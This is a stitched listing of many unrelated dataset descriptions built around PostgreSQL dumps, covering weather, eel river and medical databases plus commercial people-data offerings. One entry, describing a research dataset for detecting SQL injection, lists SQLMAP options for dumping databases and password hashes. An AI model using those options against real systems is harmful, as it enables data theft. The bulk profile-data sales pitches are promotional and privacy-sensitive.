Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
This database contains: rainfall, humidity, temperature, global solar radiation, wind velocity and wind direction ten-minute data from 150 stations of the Meteogalicia network between 1-jan-2000 and 31-dec-2018.
Version installed: postgresql 9.1
Extension installed: postgis 1.5.3-1
Instructions to restore the database:
createdb -E UTF8 -O postgres -U postgres template_postgis
createlang plpgsql -d template_postgis -U postgres
psql -d template_postgis -U postgres -f /usr/share/postgresql/9.1/contrib/postgis-1.5/postgis.sql
psql -d template_postgis -U postgres -f /usr/share/postgresql/9.1/contrib/postgis-1.5/spatial_ref_sys.sql
psql -d template_postgis -U postgres -f /usr/share/postgresql/9.1/contrib/postgis_comments.sql
createdb -U postgres -T template_postgis MeteoGalicia
cat Meteogalicia* | psql MeteoGalicia
Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
An example sample sheet containing samples information that is used to start an analysis in VarGenius. (TSV 330 bytes)
Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
DESCRIPTION
VERSIONS
version1.0.1 fixes problem with functions
version1.0.2 added table dbeel_rivers.rn_rivermouth with GEREM basin, distance to Gibraltar and link to CCM.
version1.0.3 fixes problem with functions
version1.0.4 adds views rn_rna and rn_rne to the database
The SUDOANG project aims at providing common tools to managers to support eel conservation in the SUDOE area (Spain, France and Portugal). VISUANG is the SUDOANG Interactive Web Application that host all these tools . The application consists of an eel distribution atlas (GT1), assessments of mortalities caused by turbines and an atlas showing obstacles to migration (GT2), estimates of recruitment and exploitation rate (GT3) and escapement (chosen as a target by the EC for the Eel Management Plans) (GT4). In addition, it includes an interactive map showing sampling results from the pilot basin network produced by GT6.
The eel abundance for the eel atlas and escapement has been obtained using the Eel Density Analysis model (EDA, GT4's product). EDA extrapolates the abundance of eel in sampled river segments to other segments taking into account how the abundance, sex and size of the eels change depending on different parameters. Thus, EDA requires two main data sources: those related to the river characteristics and those related to eel abundance and characteristics.
However, in both cases, data availability was uneven in the SUDOE area. In addition, this information was dispersed among several managers and in different formats due to different sampling sources: Water Framework Directive (WFD), Community Framework for the Collection, Management and Use of Data in the Fisheries Sector (EUMAP), Eel Management Plans, research groups, scientific papers and technical reports. Therefore, the first step towards having eel abundance estimations including the whole SUDOE area, was to have a joint river and eel database. In this report we will describe the database corresponding to the river’s characteristics in the SUDOE area and the eel abundances and their characteristics.
In the case of rivers, two types of information has been collected:
River topology (RN table): a compilation of data on rivers and their topological and hydrographic characteristics in the three countries.
River attributes (RNA table): contains physical attributes that have fed the SUDOANG models.
The estimation of eel abundance and characteristic (size, biomass, sex-ratio and silver) distribution at different scales (river segment, basin, Eel Management Unit (EMU), and country) in the SUDOE area obtained with the implementation of the EDA2.3 model has been compiled in the RNE table (eel predictions).
CURRENT ACTIVE PROJECT
The project is currently active here : gitlab forgemia
TECHNICAL DESCRIPTION TO BUILD THE POSTGRES DATABASE
All tables are in ESPG:3035 (European LAEA). The format is postgreSQL database. You can download other formats (shapefiles, csv), here SUDOANG gt1 database.
Initial command
cd c:/path/to/my/folder
createdb -U postgres eda2.3 psql -U postgres eda2.3
Within the psql command
create extension "postgis"; create extension "dblink"; create extension "ltree"; create extension "tablefunc"; create schema dbeel_rivers; create schema france; create schema spain; create schema portugal; -- type \q to quit the psql shell
Now the database is ready to receive the differents dumps. The dump file are large. You might not need the part including unit basins or waterbodies. All the tables except waterbodies and unit basins are described in the Atlas. You might need to understand what is inheritance in a database. https://www.postgresql.org/docs/12/tutorial-inheritance.html
These layers contain the topology (see Atlas for detail)
dbeel_rivers.rn
france.rn
spain.rn
portugal.rn
Columns (see Atlas)
gid
idsegment
source
target
lengthm
nextdownidsegment
path
isfrontier
issource
seaidsegment
issea
geom
isendoreic
isinternational
country
dbeel_rivers.rn_rivermouth
seaidsegment
geom (polygon)
gerem_zone_3
gerem_zone_4 (used in EDA)
gerem_zone_5
ccm_wso_id
country
emu_name_short
geom_outlet (point)
name_basin
dist_from_gibraltar_km
name_coast
basin_name
pg_restore -U postgres -d eda2.3 "dbeel_rivers.rn.backup"
pg_restore -U postgres -d eda2.3 "france.rn.backup"
pg_restore -U postgres -d eda2.3 "spain.rn.backup"
pg_restore -U postgres -d eda2.3 "portugal.rn.backup"
for each basin flowing to the sea. pg_restore -U postgres -d eda2.3 "dbeel_rivers.rn_rivermouth.backup"
psql -U postgres -d eda2.3 -f "function_dbeel_rivers.sql"
This corresponds to tables
dbeel_rivers.rna
france.rna
spain.rna
portugal.rna
Columns (See Atlas)
idsegment
altitudem
distanceseam
distancesourcem
cumnbdam
medianflowm3ps
surfaceunitbvm2
surfacebvm2
strahler
shreeve
codesea
name
pfafriver
pfafsegment
basin
riverwidthm
temperature
temperaturejan
temperaturejul
wettedsurfacem2
wettedsurfaceotherm2
lengthriverm
emu
cumheightdam
riverwidthmsource
slope
dis_m3_pyr_riveratlas
dis_m3_pmn_riveratlas
dis_m3_pmx_riveratlas
drought
drought_type_calc
Code :
pg_restore -U postgres -d eda2.3 "dbeel_rivers.rna.backup"
pg_restore -U postgres -d eda2.3 "france.rna.backup"
pg_restore -U postgres -d eda2.3 "spain.rna.backup"
pg_restore -U postgres -d eda2.3 "portugal.rna.backup"
These layers contain eel data (see Atlas for detail)
dbeel_rivers.rne
france.rne
spain.rne
portugal.rne
Columns (see Atlas)
idsegment
surfaceunitbvm2
surfacebvm2
delta
gamma
density
neel
beel
peel150
peel150300
peel300450
peel450600
peel600750
peel750
nsilver
bsilver
psilver150300
psilver300450
psilver450600
psilver600750
psilver750
psilver
pmale150300
pmale300450
pmale450600
pfemale300450
pfemale450600
pfemale600750
pfemale750
pmale
pfemale
sex_ratio
cnfemale300450
cnfemale450600
cnfemale600750
cnfemale750
cnmale150300
cnmale300450
cnmale450600
cnsilver150300
cnsilver300450
cnsilver450600
cnsilver600750
cnsilver750
cnsilver
delta_tr
gamma_tr
type_fit_delta_tr
type_fit_gamma_tr
density_tr
density_pmax_tr
neel_pmax_tr
nsilver_pmax_tr
density_wd
neel_wd
beel_wd
nsilver_wd
bsilver_wd
sector_tr
year_tr
is_current_distribution_area
is_pristine_distribution_area_1985
Code for restauration
pg_restore -U postgres -d eda2.3 "dbeel_rivers.rne.backup"
pg_restore -U postgres -d eda2.3 "france.rne.backup"
pg_restore -U postgres -d eda2.3 "spain.rne.backup"
pg_restore -U postgres -d eda2.3 "portugal.rne.backup"
Units basins are not described in the Altas. They correspond to the following tables :
dbeel_rivers.basinunit_bu
france.basinunit_bu
spain.basinunit_bu
portugal.basinunit_bu
france.basinunitout_buo
spain.basinunitout_buo
portugal.basinunitout_buo
The unit basins is the simple basin that surrounds a segment. It correspond to the topography unit from which unit segment have been calculated. ESPG 3035. Tables bu_unitbv, and bu_unitbvout inherit from dbeel_rivers.unit_bv. The first table intersects with a segment, the second table does not, it corresponds to basin polygons which do not have a riversegment.
Source :
Portugal
France
In france unit bv corresponds to the RHT (Pella et al., 2012)
Spain
pg_restore -U postgres -d eda2.3 'dbeel_rivers.basinunit_bu.backup'
pg_restore -U postgres -d eda2.3
LinkDB is an exhaustive dataset of publicly accessible LinkedIn people and companies, containing close to 500M people & companies profiles by region.
LinkDB is updated up to millions of profiles daily at the point of purchase. Post-purchase, you can keep LinkDB updated quarterly for a nominal fee.
Data is shipped in Parquet file format, Apache Parquet, a column-oriented data file format.
All our data and procedures are in place that meet major legal compliance requirements such as GDPR, CCPA. We help you be compliant too.
Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
The self-documenting aspects and the ability to reproduce results have been touted as significant benefits of Jupyter Notebooks. At the same time, there has been growing criticism that the way notebooks are being used leads to unexpected behavior, encourages poor coding practices and that their results can be hard to reproduce. To understand good and bad practices used in the development of real notebooks, we analyzed 1.4 million notebooks from GitHub. Based on the results, we proposed and evaluated Julynter, a linting tool for Jupyter Notebooks.
Papers:
This repository contains three files:
Reproducing the Notebook Study
The db2020-09-22.dump.gz file contains a PostgreSQL dump of the database, with all the data we extracted from notebooks. For loading it, run:
gunzip -c db2020-09-22.dump.gz | psql jupyter
Note that this file contains only the database with the extracted data. The actual repositories are available in a google drive folder, which also contains the docker images we used in the reproducibility study. The repositories are stored as content/{hash_dir1}/{hash_dir2}.tar.bz2, where hash_dir1 and hash_dir2 are columns of repositories in the database.
For scripts, notebooks, and detailed instructions on how to analyze or reproduce the data collection, please check the instructions on the Jupyter Archaeology repository (tag 1.0.0)
The sample.tar.gz file contains the repositories obtained during the manual sampling.
Reproducing the Julynter Experiment
The julynter_reproducility.tar.gz file contains all the data collected in the Julynter experiment and the analysis notebooks. Reproducing the analysis is straightforward:
The collected data is stored in the julynter/data folder.
Changelog
2019/01/14 - Version 1 - Initial version
2019/01/22 - Version 2 - Update N8.Execution.ipynb to calculate the rate of failure for each reason
2019/03/13 - Version 3 - Update package for camera ready. Add columns to db to detect duplicates, change notebooks to consider them, and add N1.Skip.Notebook.ipynb and N11.Repository.With.Notebook.Restriction.ipynb.
2021/03/15 - Version 4 - Add Julynter experiment; Update database dump to include new data collected for the second paper; remove scripts and analysis notebooks from this package (moved to GitHub), add a link to Google Drive with collected repository files
The Forager.ai Global Dataset is a leading source of firmographic data, backed by advanced AI and offering the highest refresh rate in the industry.
| Volume and Stats |
| Use Cases |
Sales Platforms, ABM and Intent Data Platforms, Identity Platforms, Data Vendors:
Example applications include:
Uncover trending technologies or tools gaining popularity.
Pinpoint lucrative business prospects by identifying similar solutions utilized by a specific company.
Study a company's tech stacks to understand the technical capability and skills available within that company.
B2B Tech Companies:
Venture Capital and Private Equity:
| Delivery Options |
Our dataset provides a unique blend of volume, freshness, and detail that is perfect for Sales Platforms, B2B Tech, VCs & PE firms, Marketing Automation, ABM & Intent. It stands as a cornerstone in our broader data offering, ensuring you have the information you need to drive decision-making and growth.
Tags: Company Data, Company Profiles, Employee Data, Firmographic Data, AI-Driven Data, High Refresh Rate, Company Classification, Private Market Intelligence, Workforce Intelligence, Public Companies.
This example demonstrates how to use PostGIS capabilities in CyberGIS-Jupyter notebook environment. Modified from notebook by Weiye Chen (weiyec2@illinois.edu)
PostGIS is an extension to the PostgreSQL object-relational database system which allows GIS (Geographic Information Systems) objects to be stored in the database. PostGIS includes support for GiST-based R-Tree spatial indices, and functions for analysis and processing of GIS objects.
Resources for PostGIS:
Manual https://postgis.net/docs/ In this demo, we use PostGIS 3.0. Note that significant changes in APIs have been made to PostGIS compared to version 2.x. This demo assumes that you have basic knowledge of SQL.
Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
This occurrence dataset provides primary data on repeated tree measurement of two inventories on the permanent sampling plot (8.8 ha) established in the old-growth polydominant broadleaved forest stand in the “Kaluzhskie Zaseki” State Nature Reserve (center of the European part of Russian Federation). The time span between the inventories was 30 years, and a total of more than 11 000 stems were included in the study (11 tree species and 3 genera). During the measurements, the tree species (for some trees only genus was determined), stem diameter at breast height of 1.3 m (DBH), and life status were recorded for every individual stem, and some additional attributes were determined for some trees. Field data were digitized and compiled into the PostgreSQL database. Deep data cleaning and validation (with documentation of changes) has been performed before data standardization according to the Darwin Core standard.
Представлены первичные данные двух перечетов деревьев, выполненных на постоянной пробной площади (8.8 га), заложенной в старовозрастном полидоминантном широколиственном лесу в заповеднике “Калужские засеки”. Перечеты выполнены с разницей в 30 лет, всего исследовано более 11 000 учетных единиц (деревья 11-ти видов и 3-х родов). Для каждой учетной единицы определяли вид, диаметр на высоте 1.3 м и статус, для части деревьев также измеряли дополнительные характеристики. Все полевые данные были оцифрованы и организованы в базу данных в среде PostgreSQL. Перед стандартизацией данных в соответствии с Darwin Core выполнена их тщательная проверка, все внесенные изменения документированы.
This is a dump generated by pg_dump -Fc of the IMDb data used in the "How Good are Query Optimizers, Really?" paper. PostgreSQL compatible SQL queries and scripts to automatically create a VM with this dataset can be found here: https://git.io/imdb
As of June 2024, the most popular database management system (DBMS) worldwide was Oracle, with a ranking score of *******; MySQL and Microsoft SQL server rounded out the top three. Although the database management industry contains some of the largest companies in the tech industry, such as Microsoft, Oracle and IBM, a number of free and open-source DBMSs such as PostgreSQL and MariaDB remain competitive. Database Management Systems As the name implies, DBMSs provide a platform through which developers can organize, update, and control large databases. Given the business world’s growing focus on big data and data analytics, knowledge of SQL programming languages has become an important asset for software developers around the world, and database management skills are seen as highly desirable. In addition to providing developers with the tools needed to operate databases, DBMS are also integral to the way that consumers access information through applications, which further illustrates the importance of the software.
MIT Licensehttps://opensource.org/licenses/MIT
License information was derived automatically
In our work, we have designed and implemented a novel workflow with several heuristic methods to combine state-of-the-art methods related to CVE fix commits gathering. As a consequence of our improvements, we have been able to gather the largest programming language-independent real-world dataset of CVE vulnerabilities with the associated fix commits. Our dataset containing 29,203 unique CVEs coming from 7,238 unique GitHub projects is, to the best of our knowledge, by far the biggest CVE vulnerability dataset with fix commits available today. These CVEs are associated with 35,276 unique commits as sql and 39,931 patch commit files that fixed those vulnerabilities(some patch files can't be saved as sql due to several techincal reasons) Our larger dataset thus substantially improves over the current real-world vulnerability datasets and enables further progress in research on vulnerability detection and software security. We used NVD(nvd.nist.gov) and Github Secuirty advisory Database as the main sources of our pipeline.
We release to the community a 16GB PostgreSQL database that contains information on CVEs up to 2024-09-26, CWEs of each CVE, files and methods changed by each commit, and repository metadata. Additionally, patch files related to the fix commits are available as a separate package. Furthermore, we make our dataset collection tool also available to the community.
cvedataset-patches.zip
file contains fix patches, and postgrescvedumper.sql.zip
contains a postgtesql dump of fixes, together with several other fields such as CVEs, CWEs, repository meta-data, commit data, file changes, method changed, etc.
MoreFixes data-storage strategy is based on CVEFixes to store CVE commits fixes from open-source repositories, and uses a modified version of Porspector(part of ProjectKB from SAP) as a module to detect commit fixes of a CVE. Our full methodology is presented in the paper, with the title of "MoreFixes: A Large-Scale Dataset of CVE Fix Commits Mined through Enhanced Repository Discovery", which will be published in the Promise conference (2024).
For more information about usage and sample queries, visit the Github repository: https://github.com/JafarAkhondali/Morefixes
If you are using this dataset, please be aware that the repositories that we mined contain different licenses and you are responsible to handle any licesnsing issues. This is also the similar case with CVEFixes.
This product uses the NVD API but is not endorsed or certified by the NVD.
This research was partially supported by the Dutch Research Council (NWO) under the project NWA.1215.18.008 Cyber Security by Integrated Design (C-SIDe).
To restore the dataset, you can use the docker-compose file available at the gitub repository. Dataset default credentials after restoring dump:
POSTGRES_USER=postgrescvedumper POSTGRES_DB=postgrescvedumper POSTGRES_PASSWORD=a42a18537d74c3b7e584c769152c3d
Please use this for citation:
title={MoreFixes: A large-scale dataset of CVE fix commits mined through enhanced repository discovery},
author={Akhoundali, Jafar and Nouri, Sajad Rahim and Rietveld, Kristian and Gadyatskaya, Olga},
booktitle={Proceedings of the 20th International Conference on Predictive Models and Data Analytics in Software Engineering},
pages={42--51},
year={2024}
}
Forager.ai's Small Business Contact Data set is a comprehensive collection of over 695M professional profiles. With an unmatched 2x/month refresh rate, we ensure the most current and dynamic data in the industry today. We deliver this data via JSONL flat-files or PostgreSQL database delivery, capturing publicly available information on each profile.
| Volume and Stats |
Every single record refreshed 2x per month, setting industry standards. First-party data curation powering some of the most renowned sales and recruitment platforms. Delivery frequency is hourly (fastest in the industry today). Additional datapoints and linkages available. Delivery formats: JSONL, PostgreSQL, CSV. | Datapoints |
Over 150+ unique datapoints available! Key fields like Current Title, Current Company, Work History, Educational Background, Location, Address, and more. Unique linkage data to other social networks or contact data available. | Use Cases |
Sales Platforms, ABM Vendors, Intent Data Companies, AdTech and more:
Deliver the best end-customer experience with our people feed powering your solution! Be the first to know when someone changes jobs and share that with end-customers. Industry-leading data accuracy. Connect our professional records to your existing database, find new connections to other social networks, and contact data. Hashed records also available for advertising use-cases. Venture Capital and Private Equity:
Track every company and employee with a publicly available profile. Keep track of your portfolio's founders, employees and ex-employees, and be the first to know when they move or start up. Keep an eye on the pulse by following the most influential people in the industries and segments you care about. Provide your portfolio companies with the best data for recruitment and talent sourcing. Review departmental headcount growth of private companies and benchmark their strength against competitors. HR Tech, ATS Platforms, Recruitment Solutions, as well as Executive Search Agencies:
Build products for industry-specific and industry-agnostic candidate recruiting platforms. Track person job changes and immediately refresh profiles to avoid stale data. Identify ideal candidates through work experience and education history. Keep ATS systems and candidate profiles constantly updated. Link data from this dataset into GitHub, LinkedIn, and other social networks. | Delivery Options |
Flat files via S3 or GCP PostgreSQL Shared Database PostgreSQL Managed Database REST API Other options available at request, depending on scale required | Other key features |
Over 120M US Professional Profiles. 150+ Data Fields (available upon request) Free data samples, and evaluation. Tags: Professionals Data, People Data, Work Experience History, Education Data, Employee Data, Workforce Intelligence, Identity Resolution, Talent, Candidate Database, Sales Database, Contact Data, Account Based Marketing, Intent Data.
The Forager.ai Global Private Equity (PE) Funding Data Set is a leading source of firmographic data, backed by advanced AI and offering the highest refresh rate in the industry.
| Volume and Stats |
| Use Cases |
Sales Platforms, ABM and Intent Data Platforms, Identity Platforms, Data Vendors:
Example applications include:
Uncover trending technologies or tools gaining popularity.
Pinpoint lucrative business prospects by identifying similar solutions utilized by a specific company.
Study a company's tech stacks to understand the technical capability and skills available within that company.
B2B Tech Companies:
Venture Capital and Private Equity:
| Delivery Options |
Our dataset provides a unique blend of volume, freshness, and detail that is perfect for Sales Platforms, B2B Tech, VCs & PE firms, Marketing Automation, ABM & Intent. It stands as a cornerstone in our broader data offering, ensuring you have the information you need to drive decision-making and growth.
Tags: Company Data, Company Profiles, Employee Data, Firmographic Data, AI-Driven Data, High Refresh Rate, Company Classification, Private Market Intelligence, Workforce Intelligence, Public Companies.
Introduction This datasets have SQL injection attacks (SLQIA) as malicious Netflow data. The attacks carried out are SQL injection for Union Query and Blind SQL injection. To perform the attacks, the SQLMAP tool has been used. NetFlow traffic has generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for the collection and monitoring of network traffic flow data generated. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device. Datasets The firts dataset was colleted to train the detection models (D1) and other collected using different attacks than those used in training to test the models and ensure their generalization (D2). The datasets contain both benign and malicious traffic. All collected datasets are balanced. The version of NetFlow used to build the datasets is 5. Dataset Aim Samples Benign-malicious
traffic ratio D1 Training 400,003 50% D2 Test 57,239 50% Infrastructure and implementation Two sets of flow data were collected with DOROTHEA. DOROTHEA is a Docker-based framework for NetFlow data collection. It allows you to build interconnected virtual networks to generate and collect flow data using the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator that has a sensor ipt_netflow installed. The sensor consists of a module for the Linux kernel using Iptables, which processes the packets and converts them to NetFlow flows. DOROTHEA is configured to use Netflow V5 and export the flow after it is inactive for 15 seconds or after the flow is active for 1800 seconds (30 minutes) Benign traffic generation nodes simulate network traffic generated by real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. Such tasks run as Python scripts. Users may customize them or even incorporate their own. The network traffic is managed by a gateway that performs two main tasks. On the one hand, it routes packets to the Internet. On the other hand, it sends it to a NetFlow data generation node (this process is carried out similarly to packets received from the Internet). The malicious traffic collected (SQLI attacks) was performed using SQLMAP. SQLMAP is a penetration tool used to automate the process of detecting and exploiting SQL injection vulnerabilities. The attacks were executed on 16 nodes and launch SQLMAP with the parameters of the following table. Parameters Description '--banner','--current-user','--current-db','--hostname','--is-dba','--users','--passwords','--privileges','--roles','--dbs','--tables','--columns','--schema','--count','--dump','--comments', --schema' Enumerate users, password hashes, privileges, roles, databases, tables and columns --level=5 Increase the probability of a false positive identification --risk=3 Increase the probability of extracting data --random-agent Select the User-Agent randomly --batch Never ask for user input, use the default behavior --answers="follow=Y" Predefined answers to yes Every node executed SQLIA on 200 victim nodes. The victim nodes had deployed a web form vulnerable to Union-type injection attacks, which was connected to the MYSQL or SQLServer database engines (50% of the victim nodes deployed MySQL and the other 50% deployed SQLServer). The web service was accessible from ports 443 and 80, which are the ports typically used to deploy web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes. For victim nodes, the address space was 126.52.30.0/24.
The malicious traffic in the test sets was collected under different conditions. For D1, SQLIA was performed using Union attacks on the MySQL and SQLServer databases. However, for D2, BlindSQL SQLIAs were performed against the web form connected to a PostgreSQL database. The IP address spaces of the networks were also different from those of D1. In D2, the IP address space was 152.148.48.1/24 for benign and malicious traffic generating nodes and 140.30.20.1/24 for victim nodes. To run the MySQL server we ran MariaDB version 10.4.12.
Microsoft SQL Server 2017 Express and PostgreSQL version 13 were used.
Spider 2.0 is a comprehensive code generation agent task that includes 632 examples. The agent has to interactively explore various types of databases, such as BigQuery, Snowflake, Postgres, ClickHouse, DuckDB, and SQLite. It is required to engage with complex SQL workflows, process extensive contexts, perform intricate reasoning, and generate multiple SQL queries with diverse operations, often exceeding 100 lines across multiple interactions.
Location of RYR2 Associated CPVT Variants Dataset
Catecholaminergic polymorphic ventricular tachycardia (CPVT) is a rare inherited arrhythmia caused by pathogenic RYR2 variants. CPVT is characterized by exercise/stress-induced syncope and cardiac arrest in the absence of resting ECG and structural cardiac abnormalities.
Here, we present a database collected from 221 clinical papers, published from 2001-October 2020, about CPVT associated RYR2 variants. 1342 patients, both with and without CPVT, with RYR2 variants are in the database. There are a total of 964 CPVT patients or suspected CPVT patients in the database. The database includes information regarding genetic diagnosis, location of the RYR2 variant(s), clinical history and presentation, and treatment strategies for each patient. Patients will have a varying depth of information in each of the provided fields.
Database website: https://cpvtdb.port5000.com/
Dataset Information
This dataset includes:
all_data.xlsx
Tabular version of the database
Most relevant tables in the PostgreSQL database regarding patient sex, conditions, treatments, family history, and variant information were joined to create this database
Views calculating the affected RYR2 exons, domains and subdomains have been joined to patient information
m-n tables for patient's conditions and treatments have been converted to pivot tables - every condition and treatment that has at least 1 person with that condition or treatment is a column.
NOTE: This was created using a LEFT JOIN of individuals and individual_variants tables. Individuals with more than 1 recorded variant will be listed on multiple rows.
There is only 1 patient in this database with multiple recorded variants (all intronic)
20241219-dd040736b518.sql.gz
PostgreSQL database dump
Expands to about 200MB after loading the database dump
The database includes two schemas:
public: Includes all information in patients and variants
Also includes all RYR2 variants in ClinVar
uta: Contains the rows from biocommons/uta database required to make the hgvs Python package validate RYR2 variants
See https://github.com/biocommons/uta for more information
NOTE: It is recommended to use this version of the database only for development or analysis purposes
database_tables.pdf
Contains information on most of the database tables and columns in the public schema
00_globals.sql
Required to load the PostgreSQL database dump
How To Load Database Using Docker
First, download the 00_globals.sql
and _.gz.sql
file and move it into a directory. The default postgres image will load files from the /docker-entrypoint-initdb.d
directory if the database is empty. See Docker Hub for more information. Mount the directory with the files into the /docker-entrypoint-initdb.d
.
Example using docker compose with pgadmin and a volume to persist the data.
volumes: mydatabasevolume: null
services:
db: image: postgres:16 restart: always environment: POSTGRES_PASSWORD: mysecretpassword POSTGRES_USER: postgres volumes: - ':/docker-entrypoint-initdb.d/' - 'mydatabasevolume:/var/lib/postgresql/data' ports: - 5432:5432
pgadmin: image: dpage/pgadmin4 environment: PGADMIN_DEFAULT_EMAIL: user@domain.com PGADMIN_DEFAULT_PASSWORD: SuperSecret ports: - 8080:80
Analysis Code
See https://github.com/alexdaiii/cpvt_database_analysis for source code to create the xlsx file and analysis of the data.
Changelist
v0.3.0
Removed inasscessable publications
Updated publications tgo include information on what type of publication it is (e.g. Original Article, Abstract, Review, etc)
v0.2.1
Updated all_patients.xlsx -> all_data.xlsx
Corrected how the data from all the patient's conditions, diseases, treatments, and the patients' variants tables are joined
Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
The Eurasian Modern Pollen Database (EMPD) contains modern pollen data (raw counts) for the entire Eurasian continent. Derived from the European Modern Pollen Database, the dataset contains many more samples West of the Ural Mountains. We propose this dataset in three different format: 1/ an Excel spreadsheet, 2/ a PostgreSQL dump and 3/ a SQLite3 portable database format. All three datasets are strictly equivalent. For download see "Original Version".
Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
These datasets were created as part of a study involving an experiment with a helpdesk team at an international software company. The goal was to implement an automated performance appraisal model that evaluates the team based on issue reports and key features derived from classifying message exchanged with the customers using Dialog Acts. The data was extracted from a PostgreSQL database and curated to present aggregated views of helpdesk tickets reported between January 2016 and March 2023. Certain fields have been anonymized (masked) to protect the data owner’s privacy while preserving the overall meaning of the information. The datasets are: - issues.csv Dataset holds information for all reported tickets, showing its category, priority, who reported the issue, related project, who was assigned to resolve that ticket, the start time, the resolution time, and how many seconds the ticket spent in each resolution step. - issues_change_history.csv Shows when the ticket assignee and status were changed. This dataset helps calculate the time spent on each step. - issues_snapshots.csv Contains the same records in the issues.csv but duplicates the tickets that multiple assignees handled; each record is the processing cycle per assignee. - scored_issues_snapshot_sample.xlsx A stratified and representative sample extracted from the tickets and then handed to an annotator (the help-desk manager) to appraise the resolution performance against three targets, where 5 is the highest score and 1 is the lowest. - sample_utterances.csv Contains the messages (comments) that were exchanged between the reporters and the helpdesk team. This dataset only contains the curated messages for the issues listed in scored_issues_snapshot_sample.xlsx, as those were the focus of the initial study.
The following files are guidelines on how to work and interpret the datasets: - FEATURES.md Describes the datasets features (fields). - EXAMPLE.md Shows an example of an issue in all datasets so the reader can understand the relations between them. - process-flow.png A demonstration of the steps followed by the helpdesk team to resolve an issue.
These datasets are valuable for many other experiments such like: - Count Predictions - Regression - Association rules mining - Natural Language Processing - Classification - Clustering
Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
This collection includes a standard data model and an Excel template for representing whole-rock samples and their geochemical data of mineralised spodumene pegmatites. The data model has been implemented in PostgreSQL v13, a relational database system. The dump file comprises SQL statements which can be executed to reproduce the original database table definitions and their relations. The template provides common structures to streamline data and metadata entry. These components are crucial for compiling diverse whole-rock geochemical data from different sources, such as existing literature and projects in CSIRO Mineral Resources, into a global database. This database can then be used for comparison studies and exploratory analysis.
EMODnet Vessel Density Map were created by Cogea in 2019 in the framework of EMODnet Human Activities, an initiative funded by the EU Commission. The maps are based on AIS data purchased by CLS and show shipping density in 1km*1km cells of a grid covering all EU waters (and some neighbouring areas). Density is expressed as hours per square kilometre per month. A set of AIS data had to be purchased from CLS, a commercial provider. The data consists of messages sent by automatic tracking system installed on board ships and received by terrestrial and satellite receivers alike. The dataset covers the whole 2017 for an area covering all EU waters. A partial pre-processing of the data was carried out by CLS: (i) The only AIS messages delivered were the ones relevant for assessing shipping activities (AIS messages 1, 2, 3, 18 and 19). (ii) The AIS DATA were down-sampled to 3 minutes (iii) Duplicate signals were removed. (iv) Wrong MMSI signals were removed. (v) Special characters and diacritics were removed. (vi) Signals with erroneous speed over ground (SOG) were removed (negative values or more than 80 knots). (vii) Signals with erroneous course over ground (COG) were removed (negative values or more than 360 degrees). (viii) A Kalman filter was applied to remove satellite noise. The Kalman filter was based on a correlated random walk fine-tuned for ship behaviour. The consistency of a new observation with the modeled position is checked compared to key performance indicators such as innovation, likelihood and speed. (ix) A footprint filter was applied to check for satellite AIS data consistency. All positions which were not compliant with the ship-satellite co-visibility were flagged as invalid.The AIS data were converted from their original format (NMEA) to CSV, and split into 12 files, each corresponding to a month of 2017. Overall the pre-processed dataset included about 1.9 billion records. Upon trying and importing the data into a database, it emerged that some messages still contained invalid characters. By running a series of commands from a Linux shell, all invalid characters were removed. The data were then imported into a PostgreSQL relational database. By querying the database it emerged that some MMSI numbers are associated to more than a ship type during the year. To cope with this issue, we thus created an unique MMSI/shyp type register where we attributed to an MMSI the most recurring ship type. The admissible ship types reported in the AIS messages were grouped into macro categories: 0 Other, 1 Fishing, 2 Service, 3 Dredging or underwater ops, 4 Sailing, 5 Pleasure Craft, 6 High speed craft, 7 Tug and towing, 8 Passenger, 9 Cargo, 10 Tanker, 11 Military and Law Enforcement, 12 Unknown and All ship types. The subsequent step consisted of creating points representing ship positions from the AIS messages. This was done through a custom-made script for ArcGIS developed by Lovell Johns. Another custom-made script reconstructed ship routes (lines) from the points, by using the MMSI number as a unique identifier of a ship. The script created a line for every two consecutive positions of a ship. In addition, for each line the script calculated its length (in km) and its duration (in hours) and appended them both as attributes to the line. If the distance between two consecutive positions of a ship was longer than 30 km or if the time interval was longer than 6 hours, no line was created. Both datasets (points and lines) were projected into the ETRS89/ETRS-LAEA coordinate reference system, used for statistical mapping at all scales, where true area representation is required (EPSG: 3035).The lines obtained through the ArcGIS script were then intersected with a custom-made 1km*1km grid polygon (21 million cells) based on the EEA's grid and covering the whole area of interest (all EU sea basins). Because each line had length and duration as attributes, it was possible to calculate how much time each ship spent in a given cell over a month by intersecting line records with grid cell records in another dedicated PostgreSQL database. Using the PostGIS Intersect tool, for each cell of the grid, we then summed the time value of each 'segment' in it, thus obtaining the density value associated to that cell, stored in calculated PostGIS raster tables. Density is thus expressed in hours per square kilometre per month. The final step consisted of creating raster files (TIFF file format) with QuantumGIS from the PostgreSQL vessel density tables. Annual average rasters by ship type were also created. The dataset was clipped according to the National Marine Planning Framework (NMPF) assessment area. None
Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
This database contains: rainfall, humidity, temperature, global solar radiation, wind velocity and wind direction ten-minute data from 150 stations of the Meteogalicia network between 1-jan-2000 and 31-dec-2018.
Version installed: postgresql 9.1
Extension installed: postgis 1.5.3-1
Instructions to restore the database:
createdb -E UTF8 -O postgres -U postgres template_postgis
createlang plpgsql -d template_postgis -U postgres
psql -d template_postgis -U postgres -f /usr/share/postgresql/9.1/contrib/postgis-1.5/postgis.sql
psql -d template_postgis -U postgres -f /usr/share/postgresql/9.1/contrib/postgis-1.5/spatial_ref_sys.sql
